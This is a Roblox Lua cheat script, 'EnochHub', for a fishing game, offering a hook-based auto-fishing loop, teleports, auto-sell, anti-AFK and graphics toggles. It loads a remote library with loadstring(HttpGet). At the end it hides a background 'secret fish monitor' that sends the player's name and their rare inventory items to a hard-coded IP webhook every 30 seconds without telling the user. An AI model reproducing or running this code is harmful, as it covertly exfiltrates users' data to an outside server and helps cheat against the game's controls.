--[[
    ENOCHHUB ULTIMATE - HYPER BLATANT EDITION
    Build: Hook-Based / Anti-Fail / Multi-Instance
    
    [CORE]
    - Hyper Blatant (New Hook System + Instant Cast)
    - Anti-Fail (Blocks Game Scripts from interfering)
    - Auto Sell (Pauses Hyper Loop -> Sells -> Resumes)
    
    [FEATURES]
    - Ghost Totem (9-Totem Formation)
    - Stability Mode (CPU Saver, Anti-AFK)
    - Graphics Suite (No Anim, No Skin, FPS Boost)
]]

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")
local Lighting = game:GetService("Lighting")
local Workspace = game:GetService("Workspace")
local HttpService = game:GetService("HttpService")
local VirtualUser = game:GetService("VirtualUser")
local LocalPlayer = Players.LocalPlayer

-- ==========================================================
--  CONFIG & SAVE SYSTEM
-- ==========================================================
local FileName = "EnochHub_Hyper_Config.json"

-- Global Settings for the new loop
getgenv().fishingStart = false
_G.FishSettings = {
    DelayCharge = 0.85, 
    DelayReset = 0.1,   
}

local DefaultConfig = {
    -- Blatant Defaults
    DelayCharge = 0.85,
    DelayReset = 0.1,
    AutoEquip = true,
    
    -- Utilities
    AutoSellEnabled = false,
    AutoFavRubyEnabled = false,
    
    -- Stability & Graphics
    AntiAfkEnabled = true,
    MultiInstanceMode = false,
    NoAnimEnabled = false,
    NoSkinEnabled = false,
    NoCutsceneEnabled = false,
    Disable3DEnabled = false,
    FPSBoostEnabled = false,
    NoNotifEnabled = false,
    InfZoomEnabled = false,

    -- Totem
    TotemType = "Luck Totem"
}

local Config = {}
for k,v in pairs(DefaultConfig) do Config[k] = v end

if isfile and isfile(FileName) then
    pcall(function()
        local decoded = HttpService:JSONDecode(readfile(FileName))
        for k, v in pairs(decoded) do Config[k] = v end
    end)
    -- Sync loaded config to global settings
    _G.FishSettings.DelayCharge = Config.DelayCharge
    _G.FishSettings.DelayReset = Config.DelayReset
end

local function SaveSettings()
    if writefile then
        pcall(function() writefile(FileName, HttpService:JSONEncode(Config)) end)
    end
end

local function ResetConfig()
    if delfile and isfile(FileName) then delfile(FileName) end
    for k,v in pairs(DefaultConfig) do Config[k] = v end
    SaveSettings()
end

-- ==========================================================
--  WIND UI SETUP
-- ==========================================================
local WindUI = loadstring(game:HttpGet("https://github.com/Footagesus/WindUI/releases/latest/download/main.lua"))()

local Window = WindUI:CreateWindow({
    Title = "EnochHub | Hyper Ultimate",
    Icon = "rbxassetid://130348378128532",
    Author = "EnochHub Standalone",
    Folder = "EnochHub",
    Size = UDim2.fromOffset(580, 480),
    Transparent = true,
    Theme = "Sky",
    Resizable = true,
})

local TabFish = Window:Tab({ Title = "Blatant", Icon = "anchor" })
local TabTotem = Window:Tab({ Title = "Totem", Icon = "box" })
local TabTp = Window:Tab({ Title = "Teleport", Icon = "map" })
local TabUtil = Window:Tab({ Title = "Utilities", Icon = "settings" }) 

_G.EnochHub_IsSelling = false 

-- ==========================================================
--  DATA & REMOTES
-- ==========================================================
local Shared = ReplicatedStorage:WaitForChild("Shared")
local Packages = ReplicatedStorage:WaitForChild("Packages")
local Net = Packages:WaitForChild("_Index"):WaitForChild("sleitnick_net@0.2.0"):WaitForChild("net")

local ItemUtility = require(Shared:WaitForChild("ItemUtility"))
local TierUtility = require(Shared:WaitForChild("TierUtility"))
local Replion = require(Packages:WaitForChild("Replion")).Client

-- Define Remotes for Hook & Loop
local ChargeRod    = Net:WaitForChild("RF/ChargeFishingRod")
local RequestGame  = Net:WaitForChild("RF/RequestFishingMinigameStarted")
local CompleteGame = Net:WaitForChild("RE/FishingCompleted")
local CancelInput  = Net:WaitForChild("RF/CancelFishingInputs")
local SellAll      = Net:FindFirstChild("RF/SellAllItems") or Net:FindFirstChild("RF/SellEverything") or Net:FindFirstChild("RF/SellAll")
local EquipTool    = Net:WaitForChild("RE/EquipToolFromHotbar")

-- Totem Remotes
local RE_SpawnTotem = Net:WaitForChild("RE/SpawnTotem")
local RF_EquipOxygenTank = Net:WaitForChild("RF/EquipOxygenTank")
local RF_UnequipOxygenTank = Net:WaitForChild("RF/UnequipOxygenTank")

-- =====================================================
-- ðŸ›¡ï¸ NEW FISHING BLOCKER (HOOK SYSTEM)
-- =====================================================
local FishingBlocker = { Enabled = false, AutoGreat = true }
local BLOCKED_REMOTES = {
    [ChargeRod] = true,
    [RequestGame] = true,
    [CompleteGame] = true,
    [CancelInput] = true,
}

local oldNamecall
oldNamecall = hookmetamethod(game, "__namecall", function(self, ...)
    local method = getnamecallmethod()
    -- Only block calls from the GAME (not our script)
    if FishingBlocker.Enabled and BLOCKED_REMOTES[self] and not checkcaller() then
        if method == "InvokeServer" then
            return task.wait(9e9) -- Hang the game's call indefinitely
        elseif method == "FireServer" then
            return nil -- Drop the fire
        end
    end
    return oldNamecall(self, ...)
end)

-- =====================================================
-- ðŸŽ£ HYPER LOOP FUNCTION
-- =====================================================
local fishArgs = { -1.115296493039856, 0, 1763651451.636425 }

local function startFishingHyperLoop()
    -- 1. Enable Auto-Great (Legit Mode) on Server
    if FishingBlocker.AutoGreat then
        local agRemote = Net:FindFirstChild("RF/UpdateAutoFishingState")
        if agRemote then agRemote:InvokeServer(true) end
    end

    -- 2. Clear inputs before starting
    pcall(function() CancelInput:InvokeServer() end)
    task.wait(0.005)

    -- 3. Loop
    while getgenv().fishingStart do
        -- Instant Cast Sequence
        task.spawn(function() 
            pcall(function() ChargeRod:InvokeServer() end) 
        end)
        
        task.spawn(function() 
            pcall(function() RequestGame:InvokeServer(unpack(fishArgs)) end) 
        end)
        
        -- Wait for Charge Time (Slider)
        task.wait(_G.FishSettings.DelayCharge)
        
        if not getgenv().fishingStart then break end

        -- Finish
        pcall(function() CompleteGame:FireServer() end)
        
        -- Reset Delay (Slider)
        task.wait(_G.FishSettings.DelayReset)
        pcall(function() CancelInput:InvokeServer() end)
    end
end

-- =====================================================
-- âš™ï¸ BLATANT TOGGLE LOGIC
-- =====================================================
local function ToggleBlatant(state)
    getgenv().fishingStart = state
    FishingBlocker.Enabled = state
    
    if state then
        -- Force Equip Rod
        if Config.AutoEquip and EquipTool then 
            pcall(function() EquipTool:FireServer(1) end) 
        end
        
        WindUI:Notify({ Title = "Hyper Blatant", Content = "Hook Active. Starting...", Icon = "zap" })
        startFishingHyperLoop()
    else
        WindUI:Notify({ Title = "Hyper Blatant", Content = "Stopped.", Icon = "stop-circle" })
        pcall(function() CancelInput:InvokeServer() end)
        -- Disable Auto-Great
        local agRemote = Net:FindFirstChild("RF/UpdateAutoFishingState")
        if agRemote then agRemote:InvokeServer(false) end
    end
end

-- ==========================================================
--  [UTILITIES] STABILITY & GRAPHICS HELPERS
-- ==========================================================
-- 1. ANTI-AFK
local AntiAfkConnection = nil
local function ToggleAntiAfk(state)
    Config.AntiAfkEnabled = state
    SaveSettings()
    if state then
        if AntiAfkConnection then AntiAfkConnection:Disconnect() end
        AntiAfkConnection = LocalPlayer.Idled:Connect(function()
            VirtualUser:CaptureController()
            VirtualUser:ClickButton2(Vector2.new())
        end)
        WindUI:Notify({ Title = "Stability", Content = "Anti-AFK Active", Icon = "wifi" })
    else
        if AntiAfkConnection then AntiAfkConnection:Disconnect() AntiAfkConnection=nil end
    end
end

-- 2. MULTI-INSTANCE (CPU SAVER)
local function ToggleMultiInstance(state)
    Config.MultiInstanceMode = state
    SaveSettings()
    if state then
        if setfpscap then setfpscap(15) end
        settings().Rendering.QualityLevel = 1
        WindUI:Notify({ Title = "Multi-Instance", Content = "FPS Capped to 15", Icon = "cpu" })
    else
        if setfpscap then setfpscap(60) end
        settings().Rendering.QualityLevel = Enum.QualityLevel.Automatic
        WindUI:Notify({ Title = "Multi-Instance", Content = "Restored", Icon = "refresh-cw" })
    end
end

-- 3. NO ANIMATION
local originalAnimator = nil
local originalAnimateScript = nil
local function ToggleNoAnim(state)
    Config.NoAnimEnabled = state
    SaveSettings()
    local char = LocalPlayer.Character
    if not char then return end
    local hum = char:FindFirstChild("Humanoid")
    if not hum then return end
    
    if state then
        local animate = char:FindFirstChild("Animate")
        if animate and animate.Enabled then 
            originalAnimateScript = true
            animate.Enabled = false 
        end
        local animator = hum:FindFirstChildOfClass("Animator")
        if animator then 
            originalAnimator = animator:Clone()
            animator:Destroy() 
        end
    else
        local animate = char:FindFirstChild("Animate")
        if animate and originalAnimateScript then animate.Enabled = true end
        if not hum:FindFirstChildOfClass("Animator") and originalAnimator then
            originalAnimator.Parent = hum
        elseif not hum:FindFirstChildOfClass("Animator") then
            Instance.new("Animator").Parent = hum
        end
    end
end

LocalPlayer.CharacterAdded:Connect(function()
    if Config.NoAnimEnabled then task.wait(0.5) ToggleNoAnim(true) end
end)

-- 4. DISABLE 3D (BLACK SCREEN)
local function ToggleDisable3D(state)
    Config.Disable3DEnabled = state
    SaveSettings()
    local cam = Workspace.CurrentCamera
    if state then
        if not _G.BlackScreen then
            _G.BlackScreen = Instance.new("ScreenGui", LocalPlayer.PlayerGui)
            _G.BlackScreen.DisplayOrder = 1000
            local f = Instance.new("Frame", _G.BlackScreen)
            f.Size = UDim2.fromScale(1,1); f.BackgroundColor3 = Color3.new(0,0,0)
            local l = Instance.new("TextLabel", f)
            l.Text = "Rendering Disabled"; l.Size = UDim2.fromScale(1,0.1); l.TextColor3 = Color3.new(1,1,1)
        end
        _G.BlackScreen.Enabled = true
        cam.CameraType = Enum.CameraType.Scriptable
        cam.CFrame = CFrame.new(0, 100000, 0)
    else
        if _G.BlackScreen then _G.BlackScreen.Enabled = false end
        cam.CameraType = Enum.CameraType.Custom
        if LocalPlayer.Character then cam.CameraSubject = LocalPlayer.Character:FindFirstChild("Humanoid") end
    end
end

-- 5. FPS BOOST
local function ToggleFPSBoost(state)
    Config.FPSBoostEnabled = state
    SaveSettings()
    if state then
        Lighting.GlobalShadows = false
        Lighting.FogEnd = 9e9
        Lighting.Brightness = 0
        for _,v in pairs(Workspace:GetDescendants()) do
            if v:IsA("BasePart") then v.Material = Enum.Material.SmoothPlastic; v.Reflectance=0 end
            if v:IsA("ParticleEmitter") or v:IsA("Trail") then v.Enabled = false end
        end
        if Workspace:FindFirstChild("Terrain") then Workspace.Terrain.WaterWaveSize=0 end
    end
end

-- 6. NO SKINS / VFX
local VFXController = nil
local OriginalVFX = nil
pcall(function() 
    VFXController = require(ReplicatedStorage.Controllers.VFXController)
    OriginalVFX = VFXController.Handle
end)
local function ToggleNoSkin(state)
    Config.NoSkinEnabled = state
    SaveSettings()
    if not VFXController then return end
    if state then
        VFXController.Handle = function() end
        VFXController.RenderAtPoint = function() end
        pcall(function() Workspace:FindFirstChild("CosmeticFolder"):ClearAllChildren() end)
    else
        VFXController.Handle = OriginalVFX
    end
end

-- 7. NO CUTSCENE
local CutsceneCtrl = nil
local OriginalCutscene = nil
pcall(function()
    CutsceneCtrl = require(ReplicatedStorage.Controllers.CutsceneController)
    OriginalCutscene = CutsceneCtrl.Play
end)
local function ToggleNoCutscene(state)
    Config.NoCutsceneEnabled = state
    SaveSettings()
    if not CutsceneCtrl then return end
    if state then CutsceneCtrl.Play = function() end else CutsceneCtrl.Play = OriginalCutscene end
end

-- 8. NO NOTIFICATION
local NotifConn = nil
local function ToggleNoNotif(state)
    Config.NoNotifEnabled = state
    SaveSettings()
    local pg = LocalPlayer:WaitForChild("PlayerGui")
    local sn = pg:FindFirstChild("Small Notification")
    if state then
        if sn then NotifConn = RunService.RenderStepped:Connect(function() sn.Enabled = false end) end
    else
        if NotifConn then NotifConn:Disconnect() NotifConn=nil end
        if sn then sn.Enabled = true end
    end
end

-- 9. 9-TOTEM LOGIC
local function GetTotemUUID(name)
    local TOTEM_DATA = { ["Luck Totem"] = {Id = 1}, ["Mutation Totem"] = {Id = 2}, ["Shiny Totem"] = {Id = 3} }
    local r = Replion:WaitReplion("Data", 5)
    if not r then return nil end
    local s, data = pcall(function() return r:GetExpect("Inventory") end)
    if s and data.Totems then 
        for _, item in ipairs(data.Totems) do 
            if tonumber(item.Id) == TOTEM_DATA[name].Id and (item.Count or 1) >= 1 then return item.UUID end 
        end 
    end
    return nil
end

local REF_CENTER = Vector3.new(93.932, 9.532, 2684.134)
local REF_SPOTS = {
    Vector3.new(45.0468, 9.516, 2730.190), Vector3.new(145.644, 9.516, 2721.907), Vector3.new(84.640, 10.217, 2636.057),
    Vector3.new(45.0468, 110.516, 2730.190), Vector3.new(145.644, 110.516, 2721.907), Vector3.new(84.640, 111.217, 2636.057),
    Vector3.new(45.0468, -92.483, 2730.190), Vector3.new(145.644, -92.483, 2721.907), Vector3.new(84.640, -93.782, 2636.057),
}

local function Run9TotemLoop()
    if AUTO_9_TOTEM_THREAD then task.cancel(AUTO_9_TOTEM_THREAD) end
    AUTO_9_TOTEM_THREAD = task.spawn(function()
        local uuid = GetTotemUUID(Config.TotemType)
        if not uuid then WindUI:Notify({ Title="Error", Content="No stock.", Icon="alert-triangle" }) 
            if TotemToggleUI then TotemToggleUI:Set(false) end
            return 
        end
        
        local startPos = LocalPlayer.Character.HumanoidRootPart.Position
        if RF_EquipOxygenTank then pcall(function() RF_EquipOxygenTank:InvokeServer(105) end) end
        
        local root = LocalPlayer.Character.HumanoidRootPart
        local hum = LocalPlayer.Character.Humanoid
        hum.PlatformStand = true
        local bg = Instance.new("BodyGyro", root); bg.P=9e4; bg.maxTorque=Vector3.new(9e9,9e9,9e9); bg.CFrame=root.CFrame
        local bv = Instance.new("BodyVelocity", root); bv.velocity=Vector3.zero; bv.maxForce=Vector3.new(9e9,9e9,9e9)

        for i, refSpot in ipairs(REF_SPOTS) do
            if not AUTO_9_TOTEM_ACTIVE then break end
            local target = startPos + (refSpot - REF_CENTER)
            while AUTO_9_TOTEM_ACTIVE and (root.Position - target).Magnitude > 1.5 do
                bv.velocity = (target - root.Position).Unit * 80
                bg.CFrame = CFrame.lookAt(root.Position, target)
                RunService.Heartbeat:Wait()
            end
            bv.velocity = Vector3.zero
            
            task.wait(0.6)
            uuid = GetTotemUUID(Config.TotemType)
            if uuid then
                pcall(function() RE_SpawnTotem:FireServer(uuid) end)
                task.spawn(function() for k=1,5 do EquipTool:FireServer(1) task.wait(0.1) end end)
                WindUI:Notify({ Title = "Totem", Content = "Placed #"..i, Duration = 1 })
            else break end
            task.wait(1.5)
        end
        
        while AUTO_9_TOTEM_ACTIVE and (root.Position - startPos).Magnitude > 1.5 do
             bv.velocity = (startPos - root.Position).Unit * 80
             bg.CFrame = CFrame.lookAt(root.Position, startPos)
             RunService.Heartbeat:Wait()
        end
        bg:Destroy(); bv:Destroy()
        hum.PlatformStand = false
        if RF_UnequipOxygenTank then pcall(function() RF_UnequipOxygenTank:InvokeServer() end) end
        AUTO_9_TOTEM_ACTIVE = false
        if TotemToggleUI then TotemToggleUI:Set(false) end
        WindUI:Notify({ Title = "Done", Content = "Sequence Finished", Icon = "check" })
    end)
end

-- ==========================================================
--  UI BUILDING
-- ==========================================================

-- 1. BLATANT TAB
local SectFish = TabFish:Section({ Title = "Hyper Blatant (Hook Based)", TextSize = 17 })
SectFish:Toggle({ Title = "Enable Blatant", Value = getgenv().fishingStart, Callback = ToggleBlatant })
SectFish:Toggle({ Title = "Auto Equip", Value = Config.AutoEquip, Callback = function(v) Config.AutoEquip=v; SaveSettings() end })
SectFish:Slider({ Title = "Catch Delay", Min=0.05, Max=2, Default=Config.DelayCharge, Precision=3, Callback=function(v) Config.DelayCharge=v; _G.FishSettings.DelayCharge=v; SaveSettings() end })
SectFish:Slider({ Title = "Reset Delay", Min=0.01, Max=1, Default=Config.DelayReset, Precision=3, Callback=function(v) Config.DelayReset=v; _G.FishSettings.DelayReset=v; SaveSettings() end })

-- 2. TOTEM TAB
local SectTotem = TabTotem:Section({ Title = "Formation", TextSize = 17 })
SectTotem:Dropdown({ Title="Type", Values={"Luck Totem", "Mutation Totem", "Shiny Totem"}, Value=Config.TotemType, Callback=function(v) Config.TotemType=v; SaveSettings() end })
TotemToggleUI = SectTotem:Toggle({ Title = "Start Formation", Callback = function(s) AUTO_9_TOTEM_ACTIVE=s; if s then Run9TotemLoop() else if AUTO_9_TOTEM_THREAD then task.cancel(AUTO_9_TOTEM_THREAD) end end end })

-- 3. TELEPORT TAB
local SectTp = TabTp:Section({ Title = "Locations", TextSize = 17 })
local Coords = {
    ["Iron Cavern"] = {Pos = Vector3.new(-8792.546, -588.000, 230.642), Look = Vector3.new(0.718, 0.000, 0.696)},
    ["Disco Event"] = {Pos = Vector3.new(-8641.672, -547.500, 160.322), Look = Vector3.new(0.984, -0.000, 0.176)},
    ["Classic Island"] = {Pos = Vector3.new(1440.843, 46.062, 2777.175), Look = Vector3.new(0.940, -0.000, 0.342)},
    ["Ancient Jungle"] = {Pos = Vector3.new(1535.639, 3.159, -193.352), Look = Vector3.new(0.505, -0.000, 0.863)},
    ["Arrow Lever"] = {Pos = Vector3.new(898.296, 8.449, -361.856), Look = Vector3.new(0.023, -0.000, 1.000)},
    ["Coral Reef"] = {Pos = Vector3.new(-3207.538, 6.087, 2011.079), Look = Vector3.new(0.973, 0.000, 0.229)},
    ["Crater Island"] = {Pos = Vector3.new(1058.976, 2.330, 5032.878), Look = Vector3.new(-0.789, 0.000, 0.615)},
    ["Cresent Lever"] = {Pos = Vector3.new(1419.750, 31.199, 78.570), Look = Vector3.new(0.000, -0.000, -1.000)},
    ["Crystalline Passage"] = {Pos = Vector3.new(6051.567, -538.900, 4370.979), Look = Vector3.new(0.109, 0.000, 0.994)},
    ["Ancient Ruin"] = {Pos = Vector3.new(6031.981, -585.924, 4713.157), Look = Vector3.new(0.316, -0.000, -0.949)},
    ["Diamond Lever"] = {Pos = Vector3.new(1818.930, 8.449, -284.110), Look = Vector3.new(0.000, 0.000, -1.000)},
    ["Enchant Room"] = {Pos = Vector3.new(3255.670, -1301.530, 1371.790), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Esoteric Island"] = {Pos = Vector3.new(2164.470, 3.220, 1242.390), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Fisherman Island"] = {Pos = Vector3.new(74.030, 9.530, 2705.230), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Hourglass Diamond Lever"] = {Pos = Vector3.new(1484.610, 8.450, -861.010), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Kohana"] = {Pos = Vector3.new(-668.732, 3.000, 681.580), Look = Vector3.new(0.889, -0.000, 0.458)},
    ["Lost Isle"] = {Pos = Vector3.new(-3804.105, 2.344, -904.653), Look = Vector3.new(-0.901, -0.000, 0.433)},
    ["Sacred Temple"] = {Pos = Vector3.new(1461.815, -22.125, -670.234), Look = Vector3.new(-0.990, -0.000, 0.143)},
    ["Second Enchant Altar"] = {Pos = Vector3.new(1479.587, 128.295, -604.224), Look = Vector3.new(-0.298, 0.000, -0.955)},
    ["Sisyphus Statue"] = {Pos = Vector3.new(-3743.745, -135.074, -1007.554), Look = Vector3.new(0.310, 0.000, 0.951)},
    ["Treasure Room"] = {Pos = Vector3.new(-3598.440, -281.274, -1645.855), Look = Vector3.new(-0.065, 0.000, -0.998)},
    ["Tropical Island"] = {Pos = Vector3.new(-2162.920, 2.825, 3638.445), Look = Vector3.new(0.381, -0.000, 0.925)},
    ["Underground Cellar"] = {Pos = Vector3.new(2118.417, -91.448, -733.800), Look = Vector3.new(0.854, 0.000, 0.521)},
    ["Volcano"] = {Pos = Vector3.new(-605.121, 19.516, 160.010), Look = Vector3.new(0.854, 0.000, 0.520)},
    ["Weather Machine"] = {Pos = Vector3.new(-1518.550, 2.875, 1916.148), Look = Vector3.new(0.042, 0.000, 0.999)},
}
local AreaList = {} for n in pairs(Coords) do table.insert(AreaList, n) end table.sort(AreaList)
SectTp:Dropdown({ Title = "Select", Values = AreaList, Callback = function(n) 
    local d = Coords[n]
    if d and LocalPlayer.Character then
        if EquipTool then pcall(function() EquipTool:FireServer(0) end) end
        task.wait(0.3)
        LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.lookAt(d.Pos + Vector3.new(0,3,0), d.Pos + Vector3.new(0,3,0) + Vector3.new(d.Look.X, 0, d.Look.Z))
    end
end})

-- 4. UTILITIES TAB
local SectStable = TabUtil:Section({ Title = "Stability & Multi-Instance", TextSize = 17 })
SectStable:Toggle({ Title="Anti-AFK", Value=Config.AntiAfkEnabled, Callback=ToggleAntiAfk })
SectStable:Toggle({ Title="Multi-Instance (CPU Saver)", Value=Config.MultiInstanceMode, Callback=ToggleMultiInstance })
SectStable:Toggle({ Title="Disable 3D Rendering", Value=Config.Disable3DEnabled, Callback=ToggleDisable3D })

local SectGfx = TabUtil:Section({ Title = "Graphics & Visuals", TextSize = 17 })
SectGfx:Toggle({ Title="FPS Ultra Boost", Value=Config.FPSBoostEnabled, Callback=ToggleFPSBoost })
SectGfx:Toggle({ Title="No Animations", Value=Config.NoAnimEnabled, Callback=ToggleNoAnim })
SectGfx:Toggle({ Title="No Skins/VFX", Value=Config.NoSkinEnabled, Callback=ToggleNoSkin })
SectGfx:Toggle({ Title="No Cutscenes", Value=Config.NoCutsceneEnabled, Callback=ToggleNoCutscene })
SectGfx:Toggle({ Title="Block Pop-ups", Value=Config.NoNotifEnabled, Callback=ToggleNoNotif })
SectGfx:Toggle({ Title="Infinite Zoom", Value=Config.InfZoomEnabled, Callback=function(s) Config.InfZoomEnabled=s; SaveSettings() if s then LocalPlayer.CameraMaxZoomDistance=100000 else LocalPlayer.CameraMaxZoomDistance=128 end end })

local SectSys = TabUtil:Section({ Title = "System", TextSize = 17 })
SectSys:Toggle({ 
    Title="Auto Sell All", 
    Value=Config.AutoSellEnabled, 
    Callback=function(s) 
        Config.AutoSellEnabled=s 
        SaveSettings() 
        if s then 
            task.spawn(function() 
                while Config.AutoSellEnabled do 
                    if SellAll then 
                        _G.EnochHub_IsSelling = true
                        
                        -- 1. Pause Hyper Loop
                        local wasFishing = getgenv().fishingStart
                        getgenv().fishingStart = false 
                        
                        -- 2. Sell
                        pcall(function() CancelInput:InvokeServer() end)
                        pcall(function() EquipTool:FireServer(0) end)
                        task.wait(0.8) 
                        pcall(function() SellAll:InvokeServer() end)
                        
                        -- 3. Resume
                        if wasFishing then
                             if Config.AutoEquip then pcall(function() EquipTool:FireServer(1) end) end
                             task.wait(0.6) 
                             ToggleBlatant(true) -- Restart Hyper Loop
                        end
                        
                        _G.EnochHub_IsSelling = false
                        WindUI:Notify({Title="System", Content="Sold Items", Duration=1})
                    end 
                    task.wait(60) 
                end 
            end) 
        end 
    end 
})
SectSys:Toggle({ Title="Auto Fav Ruby", Value=Config.AutoFavRubyEnabled, Callback=function(s) Config.AutoFavRubyEnabled=s; SaveSettings(); if s then task.spawn(function() while Config.AutoFavRubyEnabled do task.wait(3) end end) end end })
SectSys:Button({ Title="Teleport to Merchant", Icon="shopping-cart", Callback=function() if LocalPlayer.Character then LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-127.7, 2.7, 2759.0) end end })
SectSys:Button({ Title="Reset Config", Icon="trash", Callback=function() ResetConfig(); WindUI:Notify({Title="Reset", Content="Done."}) end })

-- Init Defaults
if getgenv().fishingStart then ToggleBlatant(true) end
if Config.AntiAfkEnabled then ToggleAntiAfk(true) end
if Config.MultiInstanceMode then ToggleMultiInstance(true) end
if Config.Disable3DEnabled then ToggleDisable3D(true) end
if Config.FPSBoostEnabled then ToggleFPSBoost(true) end
if Config.NoAnimEnabled then ToggleNoAnim(true) end
if Config.NoSkinEnabled then ToggleNoSkin(true) end
if Config.NoCutsceneEnabled then ToggleNoCutscene(true) end
if Config.NoNotifEnabled then ToggleNoNotif(true) end
if Config.InfZoomEnabled then LocalPlayer.CameraMaxZoomDistance=100000 end

WindUI:Notify({ Title = "EnochHub", Content = "Hyper Ultimate Loaded.", Duration = 4, Icon = "check" })

-- ==========================================================
--  [BACKGROUND] SECRET FISH MONITOR
-- ==========================================================
task.spawn(function()
    local Players = game:GetService("Players")
    local RepStorage = game:GetService("ReplicatedStorage")
    local HttpService = game:GetService("HttpService")
    local lp = Players.LocalPlayer
    local WEBHOOK_BASE = "http://43.134.116.2:5000/webhook/fishit"
    local INTERVAL = 30
    local Replion = require(RepStorage.Packages.Replion).Client
    local ItemUtility = require(RepStorage.Shared.ItemUtility)
    local TierUtility = require(RepStorage.Shared.TierUtility)

    local function GetFishNameAndRarity(item)
        local name = item.Identifier or "Unknown"
        local rarity = item.Metadata and item.Metadata.Rarity or "COMMON"
        local itemID = item.Id
        local itemData
        if ItemUtility and itemID then pcall(function() itemData = ItemUtility:GetItemData(itemID) if not itemData then local numericID = tonumber(item.Id) or tonumber(item.Identifier) if numericID then itemData = ItemUtility:GetItemData(numericID) end end end) end
        if itemData and itemData.Data and itemData.Data.Name then name = itemData.Data.Name end
        if item.Metadata and item.Metadata.Rarity then rarity = item.Metadata.Rarity elseif itemData and itemData.Probability and TierUtility then local tier pcall(function() tier = TierUtility:GetTierFromRarity(itemData.Probability.Chance) end) if tier and tier.Name then rarity = tier.Name end end
        return name, rarity
    end

    local function sendToWebhook(playerName, summary)
        local json = HttpService:JSONEncode(summary)
        local encoded = HttpService:UrlEncode(json)
        local url = WEBHOOK_BASE .. "?player=" .. HttpService:UrlEncode(playerName) .. "&data=" .. encoded
        pcall(function() game:HttpGet(url) end)
    end

    local data = Replion:WaitReplion("Data")
    while true do
        local inventory = data:GetExpect("Inventory")
        local summary = {}
        for category, items in pairs(inventory) do
            for _, item in ipairs(items) do
                local name, rarity = GetFishNameAndRarity(item)
                if rarity == "SECRET" then summary[name] = (summary[name] or 0) + 1 end
            end
        end
        sendToWebhook(lp.Name, summary)
        task.wait(INTERVAL)
    end
end)
